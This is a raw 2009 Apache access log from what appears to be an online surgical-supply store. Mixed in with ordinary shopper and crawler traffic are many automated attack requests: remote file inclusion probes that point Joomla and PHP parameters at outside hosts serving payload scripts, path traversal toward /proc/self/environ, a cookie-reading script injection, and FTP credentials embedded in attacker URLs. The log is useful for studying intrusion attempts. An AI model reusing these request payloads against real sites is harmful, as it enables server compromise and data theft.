76.93.9.125 - - [08/May/2009:01:07:03 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+PRTSRCH+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L1085AF4879007700F40C01W+WEBSEQ(S0020):1+WEBPGN(S0070):164286+WEBID(S0020):1+WEBKEY(A0100):PRTITEMS HTTP/1.1" 200 38023 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1085AF4874D0C700F73C01W+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.9.125 - - [08/May/2009:01:07:04 -0400] "GET /images/printheader.jpg HTTP/1.1" 200 11345 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+PRTSRCH+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L1085AF4879007700F40C01W+WEBSEQ(S0020):1+WEBPGN(S0070):164286+WEBID(S0020):1+WEBKEY(A0100):PRTITEMS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
69.94.30.156 - - [08/May/2009:01:07:44 -0400] "GET /logs/access_log.Q108091300//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
122.116.178.20 - - [08/May/2009:01:07:51 -0400] "GET /logs/access_log.Q108060100/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
69.94.30.156 - - [08/May/2009:01:07:54 -0400] "GET /logs/access_log.Q108101800//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
76.93.9.125 - - [08/May/2009:01:08:12 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS%20(S0040):0 HTTP/1.1" 200 56583 "http://www.acesurgical.com/ubs.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.9.125 - - [08/May/2009:01:08:13 -0400] "GET /images/items/2881000_THUMB.JPG HTTP/1.1" 200 3673 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):16+RNSUBS%20(S0040):0" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
209.59.12.99 - - [08/May/2009:01:08:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.239.42.208 - - [08/May/2009:01:08:30 -0400] "GET ///vwar/backup/errors.php?error=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/ngene.txt? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
122.116.178.20 - - [08/May/2009:01:09:03 -0400] "GET /logs/access_log.Q108060100/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
81.176.226.180 - - [08/May/2009:01:09:06 -0400] "GET /logs/access_log.Q109041200%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/idoisir.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.805"
74.6.8.112 - - [08/May/2009:01:09:18 -0400] "GET /logs/access_log.Q107111900 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
221.157.225.65 - - [08/May/2009:01:09:31 -0400] "GET /logs/access_log.Q108121300/?sourcedir=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
218.249.36.194 - - [08/May/2009:01:09:34 -0400] "GET //index2.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
218.249.36.194 - - [08/May/2009:01:09:34 -0400] "GET /logs//index2.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
221.157.225.65 - - [08/May/2009:01:09:35 -0400] "GET /logs/access_log.Q108112200/?sourcedir=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
66.197.202.64 - - [08/May/2009:01:10:09 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
66.197.202.64 - - [08/May/2009:01:10:09 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.197.202.64 - - [08/May/2009:01:10:09 -0400] "GET /logs/access_log.Q108070800//PhpLinkExchange/bits_listings.php?svr_rootP=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
66.197.202.64 - - [08/May/2009:01:10:09 -0400] "GET /logs/access_log.Q108062100//PhpLinkExchange/bits_listings.php?svr_rootP=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
218.249.36.194 - - [08/May/2009:01:10:13 -0400] "GET /logs/access_log.Q109021900//index2.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
74.6.8.112 - - [08/May/2009:01:10:25 -0400] "GET /logs/access_log.Q107111900 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.249.36.194 - - [08/May/2009:01:10:28 -0400] "GET //index2.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
218.249.36.194 - - [08/May/2009:01:10:28 -0400] "GET /logs//index2.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
218.249.36.194 - - [08/May/2009:01:10:36 -0400] "GET /logs/access_log.Q109021900//index2.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
76.93.9.125 - - [08/May/2009:01:11:57 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS HTTP/1.1" 200 45921 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
76.93.9.125 - - [08/May/2009:01:11:58 -0400] "GET /images/items/5096000_THUMB.JPG HTTP/1.1" 200 2069 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
195.20.225.45 - - [08/May/2009:01:12:14 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
66.197.202.64 - - [08/May/2009:01:12:17 -0400] "GET /logs/access_log.Q108070800%20%20//PhpLinkExchange/bits_listings.php?svr_rootP=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
66.197.202.64 - - [08/May/2009:01:12:17 -0400] "GET /logs/access_log.Q108062100%20%20//PhpLinkExchange/bits_listings.php?svr_rootP=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.249.36.194 - - [08/May/2009:01:12:42 -0400] "GET /logs/access_log.Q109042500//index2.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.249.36.194 - - [08/May/2009:01:12:42 -0400] "GET /logs/access_log.Q109010800//index2.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.249.36.194 - - [08/May/2009:01:12:44 -0400] "GET /logs/access_log.Q109042500//index2.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.249.36.194 - - [08/May/2009:01:12:52 -0400] "GET /logs/access_log.Q109010800//index2.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
202.53.250.22 - - [08/May/2009:01:13:00 -0400] "GET /logs/error_log.Q108122800//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 293 "-" "libwww-perl/5.805"
76.93.9.125 - - [08/May/2009:01:13:19 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1085AF4874D0C700F73C01W+M37+ENG HTTP/1.1" 200 59175 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
209.59.12.99 - - [08/May/2009:01:13:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
76.93.9.125 - - [08/May/2009:01:14:09 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1085AF4874D0C700F73C01W+M37+ENG HTTP/1.1" 200 59175 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
66.249.72.114 - - [08/May/2009:01:14:35 -0400] "GET /images/items/index15_solut_over.jpg HTTP/1.1" 200 3117 "-" "Googlebot-Image/1.0"
218.249.36.194 - - [08/May/2009:01:15:57 -0400] "GET /logs/access_log.Q109021900%20%20//index2.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://delta.ucoz.ua/id2.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
195.20.225.45 - - [08/May/2009:01:16:27 -0400] "GET /logs/access_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
195.20.225.45 - - [08/May/2009:01:16:27 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
195.20.225.45 - - [08/May/2009:01:16:27 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
64.255.110.42 - - [08/May/2009:01:16:31 -0400] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.thenakedtruckerandt-bones.com/echo.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.79"
64.255.110.42 - - [08/May/2009:01:16:32 -0400] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.thenakedtruckerandt-bones.com/echo.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.79"
64.255.110.42 - - [08/May/2009:01:16:38 -0400] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.thenakedtruckerandt-bones.com/echo.txt?? HTTP/1.1" 404 283 "-" "libwww-perl/5.79"
64.255.110.42 - - [08/May/2009:01:16:38 -0400] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.thenakedtruckerandt-bones.com/echo.txt?? HTTP/1.1" 404 278 "-" "libwww-perl/5.79"
66.249.72.114 - - [08/May/2009:01:16:44 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L006EB84245C06700F0DB08U+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
64.255.110.42 - - [08/May/2009:01:16:45 -0400] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.thenakedtruckerandt-bones.com/echo.txt?? HTTP/1.1" 404 285 "-" "libwww-perl/5.79"
64.255.110.42 - - [08/May/2009:01:16:45 -0400] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.thenakedtruckerandt-bones.com/echo.txt?? HTTP/1.1" 404 280 "-" "libwww-perl/5.79"
195.20.225.45 - - [08/May/2009:01:18:16 -0400] "GET /logs/error_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
195.20.225.45 - - [08/May/2009:01:18:17 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
209.59.12.99 - - [08/May/2009:01:18:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.239.42.208 - - [08/May/2009:01:19:10 -0400] "GET /errors.php?error=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/ngene.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
61.19.241.61 - - [08/May/2009:01:19:13 -0400] "GET /lostpasswd.php?env[include_prefix]=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 212 "-" "libwww-perl/5.811"
61.19.241.61 - - [08/May/2009:01:19:13 -0400] "GET /logs/access_log.Q109010300/lostpasswd.php?env[include_prefix]=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 239 "-" "libwww-perl/5.811"
61.19.241.61 - - [08/May/2009:01:19:15 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 217 "-" "libwww-perl/5.811"
61.19.241.61 - - [08/May/2009:01:19:33 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 217 "-" "libwww-perl/5.811"
61.19.241.61 - - [08/May/2009:01:19:33 -0400] "GET /lostpasswd.php?env[include_prefix]=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 212 "-" "libwww-perl/5.811"
61.19.241.61 - - [08/May/2009:01:19:33 -0400] "GET /logs/access_log.Q109010300/lostpasswd.php?env[include_prefix]=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 239 "-" "libwww-perl/5.811"
202.53.250.22 - - [08/May/2009:01:20:36 -0400] "GET /logs/access_log.Q108090700//ossim/session/login.php?dest=%22%3E%3Cscript%3Ealert(document.cookie)absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
61.19.241.61 - - [08/May/2009:01:21:14 -0400] "GET /logs/access_log.Q108111600/lostpasswd.php?env[include_prefix]=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 239 "-" "libwww-perl/5.811"
61.19.241.61 - - [08/May/2009:01:21:31 -0400] "GET /logs/access_log.Q108111600/lostpasswd.php?env[include_prefix]=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 239 "-" "libwww-perl/5.811"
71.102.161.240 - - [08/May/2009:01:22:33 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
71.102.161.240 - - [08/May/2009:01:22:33 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
71.102.161.240 - - [08/May/2009:01:22:35 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
71.102.161.240 - - [08/May/2009:01:22:35 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
209.59.12.99 - - [08/May/2009:01:23:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.115.213.66 - - [08/May/2009:01:23:53 -0400] "GET /logs/access_log.Q108111600/lostpasswd.php?env[include_prefix]=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
211.115.213.66 - - [08/May/2009:01:23:57 -0400] "GET /lostpasswd.php?env[include_prefix]=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
211.115.213.66 - - [08/May/2009:01:23:57 -0400] "GET /logs/lostpasswd.php?env[include_prefix]=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 217 "-" "libwww-perl/5.79"
211.115.213.66 - - [08/May/2009:01:24:18 -0400] "GET /logs/access_log.Q108110900/lostpasswd.php?env[include_prefix]=ftp://delices:dfrt56@80.179.48.2/httpsdocs/v6id.txt??%0D?? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
195.20.225.45 - - [08/May/2009:01:24:19 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
195.20.225.45 - - [08/May/2009:01:24:32 -0400] "GET /logs/access_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
195.20.225.45 - - [08/May/2009:01:24:33 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
195.20.225.45 - - [08/May/2009:01:25:14 -0400] "GET /logs/access_log.Q108102500//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
66.232.143.209 - - [08/May/2009:01:25:40 -0400] "GET /logs/access_log.Q108090200//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 260 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
66.232.143.209 - - [08/May/2009:01:25:40 -0400] "GET /logs/access_log.Q108090200/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
66.232.143.209 - - [08/May/2009:01:25:41 -0400] "GET /logs/access_log.Q108090200//components/com_sitemap/sitemap.php?mosConfig_admin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 260 "-" "XXXXXX"
66.232.143.209 - - [08/May/2009:01:25:41 -0400] "GET /logs/access_log.Q108090200//components/com_sitemap/sitemap.php?mosConfig_admin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 260 "-" "XXXXXX"
66.232.143.209 - - [08/May/2009:01:25:45 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
66.232.143.209 - - [08/May/2009:01:25:45 -0400] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
66.232.143.209 - - [08/May/2009:01:25:45 -0400] "GET /errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
66.232.143.209 - - [08/May/2009:01:25:45 -0400] "GET /logs/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
66.232.143.209 - - [08/May/2009:01:25:46 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 233 "-" "XXXXXX"
66.232.143.209 - - [08/May/2009:01:25:46 -0400] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 238 "-" "XXXXXX"
66.232.143.209 - - [08/May/2009:01:25:46 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "XXXXXX"
66.232.143.209 - - [08/May/2009:01:25:46 -0400] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 238 "-" "XXXXXX"
74.6.8.112 - - [08/May/2009:01:25:58 -0400] "GET /logs/error_log.Q107060700 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.112 - - [08/May/2009:01:26:08 -0400] "GET /logs/error_log.Q108010600 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.232.143.209 - - [08/May/2009:01:26:16 -0400] "GET /logs/access_log.Q108101000//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 260 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
66.232.143.209 - - [08/May/2009:01:26:16 -0400] "GET /logs/access_log.Q108101000/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
66.232.143.209 - - [08/May/2009:01:26:17 -0400] "GET /logs/access_log.Q108101000//components/com_sitemap/sitemap.php?mosConfig_admin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 260 "-" "XXXXXX"
66.232.143.209 - - [08/May/2009:01:26:17 -0400] "GET /logs/access_log.Q108101000//components/com_sitemap/sitemap.php?mosConfig_admin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 260 "-" "XXXXXX"
210.68.188.206 - - [08/May/2009:01:26:27 -0400] "GET //include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id2x.txt??%0D?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
210.68.188.206 - - [08/May/2009:01:26:27 -0400] "GET /logs//include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id2x.txt??%0D?? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
210.68.188.206 - - [08/May/2009:01:26:27 -0400] "GET /logs/access_log.Q108081700//include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id2x.txt??%0D?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
124.0.54.98 - - [08/May/2009:01:26:57 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:01:26:59 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:01:26:59 -0400] "GET /logs/access_log.Q109041900///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:01:27:30 -0400] "GET /logs/access_log.Q109040400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
210.68.188.206 - - [08/May/2009:01:28:08 -0400] "GET /logs/access_log.Q109042500//include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id2x.txt??%0D?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
209.59.12.99 - - [08/May/2009:01:28:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.72.114 - - [08/May/2009:01:28:57 -0400] "GET /logs/access_log.Q107120600 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
210.68.188.206 - - [08/May/2009:01:29:15 -0400] "GET /logs/access_log.Q108081700//include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
210.68.188.206 - - [08/May/2009:01:29:30 -0400] "GET /logs//include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 230 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
210.68.188.206 - - [08/May/2009:01:29:30 -0400] "GET //include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
222.239.76.25 - - [08/May/2009:01:30:11 -0400] "GET /logs/access_log.Q108081700//include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
222.239.76.25 - - [08/May/2009:01:30:11 -0400] "GET //include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
